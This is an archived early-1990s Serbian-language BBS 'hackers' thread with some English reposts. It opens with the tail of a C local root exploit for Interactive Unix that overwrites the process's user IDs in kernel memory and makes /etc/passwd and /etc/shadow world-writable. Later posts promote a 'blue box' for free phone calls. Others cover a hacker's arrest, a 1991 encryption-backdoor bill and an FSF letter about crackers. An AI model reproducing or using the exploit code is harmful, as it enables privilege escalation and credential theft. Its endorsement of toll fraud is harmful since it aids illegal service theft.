#ifdef ISC22 #include <sys/limits.h> #include <sys/unistd.h> #else #include <limits.h> #include <unistd.h> #endif #include <sys/sysi86.h> #include <sys/signal.h> #include <sys/types.h> #define ushort unsigned short #define ulong unsigned long #include <sys/fs/s5dir.h> #include <sys/user.h> main() { struct user *dumm; /* 0xE0000000 is the virtual adress of the ublock for the current running programm. */ dumm = (struct user *) 0xE0000000; /* Here we are so kind to change our effective and real user id to zero, which means, that we can do whatever we want... */ dumm-> u_uid = 0; /* A well programmed system has to give a segmentation oder protection violation error at this line. But don't expect Interactive Unix to do so... */ dumm-> u_gid = 0; dumm-> u_ruid = 0; dumm-> u_rgid = 0; /* What would be the first thing you want to do if you become root on another system ? */ chmod ("/etc/passwd",(int) 0666); chmod ("/etc/shadow",(int) 0666); /* If you don't believe what I say, uncomment the following line: */ /* execl("/bin/sh","sh","-c","/bin/ls -l /etc/passwd",(char *) 0); */ } --- END OF toete.c --- JUST HAVE FUN ! mfg. JL -- lumpi@dobag.in-berlin.de -- "Nothing is the complete absence of everything."
hackers.71 vzivkovic,
Zdravo! Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX, koji pomocu zvuka od par hiljada Hz, prevari postu, i misli da je veza prekinuta, a u stvari nije... i tako moze da se neograniceno razgovara (modemise) a da telefonski racun bude minimalan... Drugim recima, BLUE BOX omogucava FREE CALLS ili besplatne pozive... Uredjaj je veoma popularan i zakonom zabranjen, a moze biti otkriven jedino ukoliko dodju kod tebe i vide ga - nikako drugacije... Pomocu dobijene sheme, nece biti tesko napraviti BLUE BOX.... Da li je jos neko imao prilike da se sretne sa izrazom BLUEBOXing, ili je negde cuo nesto o tome? Pozdrav, Vladimir
hackers.72 ivujanic,
>>Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX, koji >>pomocu zvuka od par hiljada Hz, prevari postu, i misli da je veza >>prekinuta, a u stvari nije... i tako moze da se neograniceno razgovara >>(modemise) a da telefonski racun bude minimalan... Jedini je problem da li to radi na našim impulsnim centralama u šta čisto sumnjam, jer je to američki fazon, a tamo su centrale tonske, tj. telefoni pevaju umesto da seckaju... Ivica
hackers.73 ppekovic,
>> Jedini je problem da li to radi na našim impulsnim centralama >>u >>šta >>čisto sumnjam, jer je to američki fazon, a tamo su centrale tonske, >>tj. >>telefoni pevaju umesto da seckaju... Da kucnem u drvo i kod nas ima sve više "tonskih" centrala. Pitaj vkrstonosic-a ako ne veruješ. Pi-pu-pi-pa-pe riiiiiingg ;((( šmrc, kadće to stići u moje pasivne krajeve ;((( Paya
hackers.74 vzivkovic,
Da, stvar RADI! i na nasim centralama i to veoma uspesno... :)))))))) Nema vise kilometarskih tel. racuna!
hackers.75 lanik,
>> Danas sam dobio shemu i 'blueprints' za uredjaj zvani BLUE BOX, >> Drugim recima, BLUE BOX omogucava FREE CALLS ili besplatne pozive... Koliko tražiš za tu šemu????? ;))))))) --> Keyboard? How Quaint! <--
hackers.76 dejanr,
>> Da, stvar RADI! i na nasim centralama i to veoma uspesno... Kako znaš? Mislim, znaćeš tek kad stigne račun. Uzgred, ne znam koliko je besplatno telefoniranje dovoljan razlog za "nemiran san" jer ipak nije ni pošta baš luda pa da to ne može otkriti - pogotovu ako jednom uzme maha. A čak i ako ne otkrije, kršenje zakona je ipak kršenje zakona. PS Znaš li kako Elektrodistribucija otkriva one koji "kradu struju"? Vrlo jednostavno - najčešće ih prijavi komšija ;) Takav smo narod.
hackers.77 vzivkovic,
Na zalost, nije na prodaju!
hackers.78 vzivkovic,
Nazalost, ta pojava 'otkucavanja' mi je poznata, pa vise necu ni da govorim o BB-u da se ne bi izdao :)... Nego, sigurno radi jer imam prijatelja u posti koji moze da vidi kako mi 'kucaju' impulsi kada razgovaram, a kada sam koristio BB, impulsa nije ni bilo! Pozdrav, Vladimir
hackers.79 dejanr,
Mislim da je i ovde bilo reči o izvesnom George-u Powellu i njegovim hakerskim "poduhvatima". Evo kako se priča završava: :show resume yllar.17 yllar.17, George Powell, Danville, IL Last on: Sat Apr 20 17:03:53 1991 Goodbye all......... This will be the last anyone heres from me in computer land. Since my arrest for hacking/fraud, ive gotten myself in such a mess that the possibility of ever getting out, is now only a dream. Ive decided to abandon computers and the telcom world. Many thanx for the great times ive had on bix and the other places ive known. Bixbilling has been informed to cancel this account. Crying myself to sleep every night, I always think how so much different things could have been. I had so much of a possibility, a decent job waiting, a education and life was fun. Now thing are so different, I have no possibility of a good job, my past follows me, and i can't escape it, now im just a felon with a criminal record. Months pass, and it just gets worse, my parrents are dying, my job is going no where, and the money i do make goes for debts. Fun is only a memory, i work, and i sleep, that's my life. At least when i am gone, the memories will remain, and hopefully someone will remember me, and maby not get themselves into the mess i have. I had it all, but I just threw it away.
hackers.80 dejanr,
========== security/main #1201, from epbh, 1367 chars, Fri Apr 26 09:53:11 1991 Comment(s). ---------- According to Network World there is a provision in a bill now before Congress which recommends that carriers and equipment makers provide the government with the means to decode encrypted communications. The provision does not detail how suppliers would provide such capabilites but the article goes on to speculate that it would probably invlove the development of electronic trapdoors or master keys that could be used to decrypt data, voice, or video communication without a user's permission. Backers of the provision say it will help the government combat terrorist and criminal organizations that are using sophisticated encryption systems. The article goes on to quote Eddie Zeitler, vice-president for information security services at Fidelity Investments in Boston. "It would severly limit the usefulness of encryption. Over time, you would no longer know who has the trapdoor or keys. Security could not be assured." The provision is contained in a counterterrorism bill introduced by Sen. Joseph Biden, (D-Del.) in January. It reads: "It is the sense of Congress that providers of electronic communications services and manufacturers of electronic communications equipment shall ensure that communications systems permit the government to obtain the plain text contents of voice, data, and other communications when appropriately authorized by law." ========== security/main #1202, from roedy, 300 chars, Fri Apr 26 10:03:53 1991 Comment to 1201. Comment(s). More refs to 1201. ---------- given that terrorists or even environmental organizations can use their own algorithms, even 1-write uncrackable ones, this requirement to me seems futile -- only allowing snooping on low security business traffic. It ranks up there with the silly export restrictions on the Published DES algorithm. ========== security/main #1204, from hshubs, 170 chars, Fri Apr 26 16:39:18 1991 Comment to 1201. Comment(s). More refs to 1201. ---------- I'm totally against this idea. It makes encryption totally useless, and allows the government to spy easier. If they wish to spy, let them really work _*HARD*_ at it. ========== security/main #1205, from m.bradley, 106 chars, Fri Apr 26 23:16:10 1991 Comment to 1204. Comment(s). ---------- Same here. Could anyone post the bill number so those inclined can write their Congresscritter about it? ========== security/main #1206, from hshubs, 158 chars, Fri Apr 26 23:19:03 1991 Comment to 1205. More refs to 1205. ---------- BTW, don't let my opinions stop anyone from disagreeing if they wish. If you disagree, please say so, and say _why_. If I'm wrong, I wish to know it. :-, ========== security/main #1207, from roedy, 164 chars, Fri Apr 26 23:26:29 1991 Comment to 1205. Comment(s). ---------- I think I know what this bird is up to. He is being bribed by some out of work security companies to stimulate business setting up new private encryption schemes. ========== security/main #1208, from hshubs, 121 chars, Fri Apr 26 23:42:47 1991 Comment to 1207. ---------- Then there's the company talked about in 'microbytes/items #1512', which is going about it in a somewhat different way. ========== security/main #1209, from dave2, 295 chars, Sat Apr 27 00:51:35 1991 Comment to 1201. ---------- Yeah. Throw everything out the window - just gun 'em down in cold blood if they look like terrorists. Why take a chance? Looks like the "War on Drugs" is subsiding while the "War on Terrorism" is being pushed. Hoo, boy. I'm already down as a "known or suspected terrorist" in five states. ========== security/main #1210, from yllar.17, 183 chars, Sat Apr 27 04:35:41 1991 Comment to 1202. Comment(s). ---------- silly is for sure...like someone who is into that sorta nasty stuff is really gonna abide by the law in the first place... they are just wasting their breath and energy... L8tr :( ========== security/main #1211, from hamilton, 963 chars, Sat Apr 27 10:50:47 1991 Comment to 1210. ---------- It's worse than that: underlying a provision like this is the notion that somehow the government should have this right to open up anyone's mail or data on some pretext of fighting drugs or some similar nonsense. I will tell you that the most terrifying part of this "war on drugs" is not the drugs themselves but rather the unprecedent assault now being waged on our civil liberties. Even more sickening is to realize that this tragic loss is not even delivering the promised benefits: drugs and crime are not being reduced in any meaningful way. Only an ideologue could support the war on drugs without insisting on a fair accounting to see that it works. Every day I come a bit closer to being convinced that even the most ardent supporters of the war on drugs know that it is a failure. And I come a bit closer to being convinced their mission is not the eradication of drugs but simply the creation of a police state. Drugs are merely a cover story.
hackers.81 dejanr,
========== security/long.messages #117, from hshubs, 6072 chars, Wed Aug 7 00:48:53 1991 ---------- Msg#:49475 *BCS_OLSC* 06/13/91 14:24:03 From: OFER INBAR To: HOWARD SHUBS Subj: THE FSF GUEST ACCOUNT On the subject of the Free Software Foundation and their decision (Stallman was the only dissenting vote) to close the guest account, here's an open letter from Noah Friedman, FSF accounts administrator: Date: Wed, 5 Jun 91 08:25:36 edt From: friedman@gnu.ai.mit.edu Subject: An open letter The following is a personal essay and clarification of some of the things that have been going on around the FSF. To some extent, IRC has been affected by what we do. This is not an official statement by the FSF and the opinions expressed here are not necessarily representative of the organization as a whole or of any of its members (except for myself). But first, a statement of fact. The user "belladona" (tami@gnu.ai.mit.edu) on IRC has not, and never did, give the root password to the FSF machines to anyone on IRC. She was teasing naive people who asked for the root password by giving them false ones. Some of these characters were naive enough to go around walloping "Hey! I've got the root password!" without even checking to see if it worked. And it doesn't help that apparently clueful (I guess I was mistaken) people went around spreading this rumor without checking their facts. Our machines are (were) not particularly secure. It was trivial to obtain root access without the password. Friday afternoon, around 3:00 PM, staff members in the office pulled the FSF machines off the net, turned off all accounts and made the machines a bit more externally secure. There was no warning given to guests, staff, or volunteers working from remote sites. Starting a month or two ago the amount of destructive and annoying behavior by some of the FSF guests began to increase. We received complaints from all over the country about some of our guests breaking into remote sites, sending abusive mail is massive quantities, and harassing users on IRC. Probably these same guests were also responsible for deleting files on our systems and bringing our machines down so that they were completely unusable. The staff members who work in the Cambridge office and the board of directors (with the exception of Richard Stallman, who wishes it to be known that he does not agree with or accept the decisions we made) decided that it would probably be necessary to remove the anonymous open accounts from our systems. We discussed plans for doing so, but only by voice or in person. We had to implement "email-silence" because we knew that some of the crackers on our systems were reading our mail. It would not have been a good idea to let them on to what we were up to. I hope this explains why we were unable to warn people what was about to happen. Friday afternoon someone (possibly more than one person) did something so pointlessly destructive that the people in the office decided to carry out the actions we had planned on for a later date. I won't go into the details. The people who are responsible know what I'm talking about. This won't affect our policy of giving people guest accounts. We like having guests on our machines and I know that many, many people have benefitted by the fact they they can use them. Of the hundreds (possibly thousands) of New mail on node UBBG from UBBG::EPANTIC "Srdjan Pantic ETF Beograd YU"people who used our machines, probably only 6 or 7 caused any trouble. Unfortunately, these 6 or 7 people were persistent enough and obnoxious enough to spoil things for everyone else. All we've done at this point is to remove the anonymous accounts, and disabled the other accounts until users can change their passwords. The crackers had modified various programs on the system and recorded the passwords of most of the accounts, and this makes it necessary to insure that teyae changed before the accounts are re-enabled. Hopefully, this policy will allow us to restrict access to our machines by people who are bent on causing damage. We do not encourage cracking. We never did. Our open access policy was originally a way of expressing to crackers that they didn't need to be antisocial and that "breaking in" wasn't necessary. We welcomed them (along with anyone else who knew about us) to use the computers here and tried to encourage them to do something constructive. A lot of the time we succeeded. The FSF has always tried to encourage people to do beneficial and constructive things. That's why the GNU project was started. The idea was to provide a complete operating system which everyone could use as a base for writing and sharing software freely. At the same time, the FSF wanted to teach people that it was possible to share computing resources in an open environment where people worked toward improving the system as a whole. While the two issues are not completely intertwined such that one without the other is impossible, they are reflections of the same general philosophy. Security is an obstruction which prevents people from doing this "without permission." By removing our anonymous accounts we now say to the world "we have to assume that everyone is guilty and untrustworthy until further inspection." What a sad statement about human nature that is! To the people who contributed to forcing us to change the way we think, thanks heaps. You've caused more damage and unhappiness than you can possibly imagine. --- Noah Friedman friedman@gnu.ai.mit.edu System administrator, Free Software Foundation (PS: if you're thinking of asking for an account at this point, don't. There is too much work to do at the moment for anyone to take the time to make them.) -------------------------------------------------------------------- BTW, the "something so pointlessly destructive" mentioned in the above letter was, I think, when someone deleted their entire mail spool (that is, everyone's unread email). -- Cos (Ofer Inbar) -- cos@chaos.cs.brandeis.edu -- WBRS (100FM) -- WBRS@binah.cc.brandeis.edu WBRS@brandeis.bitnet --- TMail v1.20 * Origin: BCS IBM UG TBBS, 617-332-5584 (1:101/310)
hackers.82 djelovic,
Rezultati zvanja broja 533-333 Ja: Dobar dan, je li to PTT? On: Dobar dan, jeste. Ja: Zanima me procedura za prelazak na tonsko biranje. On: Jeste li vec prikljuceni ili treba da podnesete zahtev. Ja: Zahtev. On: A odakle vam ovaj broj telefona? Ja: Dao mi je prijatelj. On: Pa neka se onda javi taj prijatelj da malo popricamo. Ja: Ne razumem, u cemu je problem? On: Pa obicno to ne dajemo, ali ako se javi taj kolega mogli bi to da sredimo. Znate, upisemo tamo (...), i sve bude u redu. Ja: Hvala vam i dovidjenja. On: Dovidjenja (jel se ovo pise zajedno ili odvojeno?). Ja: <klik> On: <klik> Ja: <smrc>
hackers.83 vojkan,
Juče sam slučajno obrnuo neki tel broj i javilo se neko pišatanje. Ja naravno pokušah ponovo sa modemom i nemogoše da se prepoznaju zvučalo je kao neki drugi format prenosa (drugaćiji odo ovog klasićnog) tako da ću pokušati da to sredim. Evo i telefona ako je ko slućajno zainteresovan 627-657. Vojkan
hackers.84 dejanr,
>> Juče sam slučajno obrnuo neki tel broj i javilo se neko >> pišatanje. Ja naravno pokušah ponovo sa modemom i Verovatno je fax.
hackers.85 magician,
­=> Juce sam slucajno obrnuo neki tel broj i javilo se neko ­=> pisatanje. Ja naravno pokusah ponovo sa modemom i ­=> nemogose da se prepoznaju zvucalo je kao neki drugi ­=> format prenosa (drugaciji odo ovog klasicnog) tako ­=> da cu pokusati da to sredim. Evo i telefona ako je ­=> ko slucajno zainteresovan 627-657. Ccc... Mi ovde pricamo i o FAX karticama a ti jos nisi cuo ni kako zvuci obican telefax... :( MAGICIAN P.S. Svidja mi se sto si ovo stavio u temu 'hackers' :)
hackers.86 vojkan,
-> Svidja mi se sto si ovo stavio u temu 'hackers' :) Da imaš pravo baš lepo zvuči ;)